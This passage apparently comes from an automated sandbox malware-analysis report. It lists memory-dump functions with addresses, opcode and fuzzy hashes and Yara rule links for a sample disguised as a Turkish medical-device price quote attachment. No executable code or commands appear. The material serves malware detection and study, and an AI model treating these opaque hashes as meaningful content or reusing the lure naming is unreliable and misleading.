                                                                                                                          • Opcode Fuzzy Hash: 2ebe7123de31747e42d0dd8e749932f1af39f5866c6e146dea5886f291ff80da
                                                                                                                          • Instruction Fuzzy Hash: 3401D678D0020ADFDB40DFA8E844ABEBBB1FB48300F10856AE925A3354D7359A15DF91
                                                                                                                          Function 010CD01F Relevance: .0, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781393592.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_10cd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8b0e0ad6740e644d8d41900f15c29e635ab1c1ea63921e7b94158ac9b2e56c8b
                                                                                                                          • Instruction ID: e88d457d5842349a6d1a926975281130af71a169a5d52f573ca82982e0eccf32
                                                                                                                          • Opcode Fuzzy Hash: 8b0e0ad6740e644d8d41900f15c29e635ab1c1ea63921e7b94158ac9b2e56c8b
                                                                                                                          • Instruction Fuzzy Hash: 7BF0FF75600604AF97248F0AD884C27FBADFBC4A70755C59EFD4A4B612C671EC42CFA0
                                                                                                                          Function 01246347 Relevance: .0, Instructions: 34COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ccbe1a9f83133b3a8bd29df48133ae796172e6c148d65e654e39f30cf3d092b
                                                                                                                          • Instruction ID: 0448550363f7a93516b6b506ade5b19d1ce775ed54ed270122487841619c52b1
                                                                                                                          • Opcode Fuzzy Hash: 0ccbe1a9f83133b3a8bd29df48133ae796172e6c148d65e654e39f30cf3d092b
                                                                                                                          • Instruction Fuzzy Hash: 0EF0E932B5252147DB1A672E501422E7B52EBC1B65308853DC9019B748CF21CC4147C0
                                                                                                                          Function 01249C2F Relevance: .0, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba4b8aa5652feac397666d011a21b531c98f790bed964be80beaff05b55329d3
                                                                                                                          • Instruction ID: 5bb7a265a4e7ef9e292c8fb20306d36133f819a1296b8c7ce977f881fa6bf714
                                                                                                                          • Opcode Fuzzy Hash: ba4b8aa5652feac397666d011a21b531c98f790bed964be80beaff05b55329d3
                                                                                                                          • Instruction Fuzzy Hash: F6F0A031A101189FCF14DF69E848AEEBBF5EBCC321F10C026E908C3200D7714A55CB90
                                                                                                                          Function 0124A5F7 Relevance: .0, Instructions: 21COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 415ce1b4cd1e2288683c991e577118c99bc38e286cde53c10c804ea97c05fd5c
                                                                                                                          • Instruction ID: 6ff0e43dcb9587517266d7674d2e6e6764a13cfa4acbfb8179f183a0aeb0b1b7
                                                                                                                          • Opcode Fuzzy Hash: 415ce1b4cd1e2288683c991e577118c99bc38e286cde53c10c804ea97c05fd5c
                                                                                                                          • Instruction Fuzzy Hash: 84E0863365401DAF9B05DA58E8018FEB7B8FB48324B008957F59AC7041D730D6158B60
                                                                                                                          Function 012428A2 Relevance: .0, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2413fb8acbaa86a0e7789155fd07cb536be5c99db9f2bd3469c3fbe4430fb02c
                                                                                                                          • Instruction ID: 6b88010bd84908b5ded22b2fec372defcba9ac76715f2e858ce25158ea39e968
                                                                                                                          • Opcode Fuzzy Hash: 2413fb8acbaa86a0e7789155fd07cb536be5c99db9f2bd3469c3fbe4430fb02c
                                                                                                                          • Instruction Fuzzy Hash: 53E08676D60726C7CB01E7E59C040FEBB34ADD5221B54461BD16532144FF30565986A5
                                                                                                                          Function 012428B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2779e9d883c9d9c9a3aa1f75772b0d140cab3230b2cb73a0cc7f0a122c9e94c4
                                                                                                                          • Instruction ID: ef5dbbe1767686fdc5f458a7ef8afab6bd786ce6bfe0316d8ebc091b3e8b8b86
                                                                                                                          • Opcode Fuzzy Hash: 2779e9d883c9d9c9a3aa1f75772b0d140cab3230b2cb73a0cc7f0a122c9e94c4
                                                                                                                          • Instruction Fuzzy Hash: 1AD05B31D2032A57CB11E7A5DC044DFFB38EED5321B914626D51437144FB706659C6E1
                                                                                                                          Function 01248EF7 Relevance: .0, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
                                                                                                                          • Instruction ID: b80ddc7d718ffa90420a6e798da84b5ef1b9b0bdb82851864728dbc247f7767f
                                                                                                                          • Opcode Fuzzy Hash: ccc09a641997dd90366e1a424372f895c5cdedfedc8f708346f3c000f259c187
                                                                                                                          • Instruction Fuzzy Hash: A1C0123352C0642F973A009D3C819F75B5DC3C53B4A660177FB5DD320198424C824164
                                                                                                                          Function 0124AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c21c8ed009ce3c91f59414fb0b2ca306955d274b57dab1f98be17cc80393c562
                                                                                                                          • Instruction ID: d6a8a9d336b6146e91e56afef64864528c12f0bbdb8af754800cd1f32478384c
                                                                                                                          • Opcode Fuzzy Hash: c21c8ed009ce3c91f59414fb0b2ca306955d274b57dab1f98be17cc80393c562
                                                                                                                          • Instruction Fuzzy Hash: B8D0673AB400089FDB04DF99E8409DDF776FB98321B548517EA15A3260C6319965DBA0
                                                                                                                          Function 01246747 Relevance: .0, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 596ff5d6aeeec5ed1308e0a42df818fe6726846cbf00aacba7d92a6d3a9c3082
                                                                                                                          • Instruction ID: 7d069c9ecaf0be4aa48b5fe60b5fda642d200c0cd3ca9e0e3d7eac69d627726d
                                                                                                                          • Opcode Fuzzy Hash: 596ff5d6aeeec5ed1308e0a42df818fe6726846cbf00aacba7d92a6d3a9c3082
                                                                                                                          • Instruction Fuzzy Hash: 37D012348403155FDE11F772F8955EC3776ABC05147849B54D4450E94DDF71089B8F50
                                                                                                                          Function 01246748 Relevance: .0, Instructions: 12COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2577f95d3b5aaa0da07d5fd69a61f6db0a4eba72865d5d7e5c4be5edf04b27b4
                                                                                                                          • Instruction ID: 52cc1727907930511a119ad51ab13b3796ed6470855a477d42b34f5ba1d7f118
                                                                                                                          • Opcode Fuzzy Hash: 2577f95d3b5aaa0da07d5fd69a61f6db0a4eba72865d5d7e5c4be5edf04b27b4
                                                                                                                          • Instruction Fuzzy Hash: 4CC012348403194FD901F772FC44699336A67C05147C49A5490050E94DDF7418964EA5

                                                                                                                          Non-executed Functions

                                                                                                                          Function 01246920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: \;q$\;q$\;q$\;q
                                                                                                                          • API String ID: 0-2933265366
                                                                                                                          • Opcode ID: 41faceeb1f0b68e540fe341cb7306c4c0b30506f99e3f1f5fe84566264a64c32
                                                                                                                          • Instruction ID: e63cdeca487313fd3b320dd3a734cc2b4842cc3342fd9c1f5e822e9ba3ef63c8
                                                                                                                          • Opcode Fuzzy Hash: 41faceeb1f0b68e540fe341cb7306c4c0b30506f99e3f1f5fe84566264a64c32
                                                                                                                          • Instruction Fuzzy Hash: 5101A239730116CFD76C8A2DC841AA577E6BF8AB60729416AE606CB371EAF1DC428750